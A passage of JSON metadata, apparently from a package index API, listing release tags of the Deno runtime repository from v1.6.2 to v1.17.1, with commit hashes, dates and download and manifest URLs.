2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7dc8d675d70f0061bdaf99ae4a08d84156aa9","kind":"commit","published_at":"2021-02-13T13:20:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.4/manifests"},{"name":"v1.7.3","sha":"f67b06939be5b754ecee306e9da1d7c0779c3cd6","kind":"commit","published_at":"2021-02-12T16:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/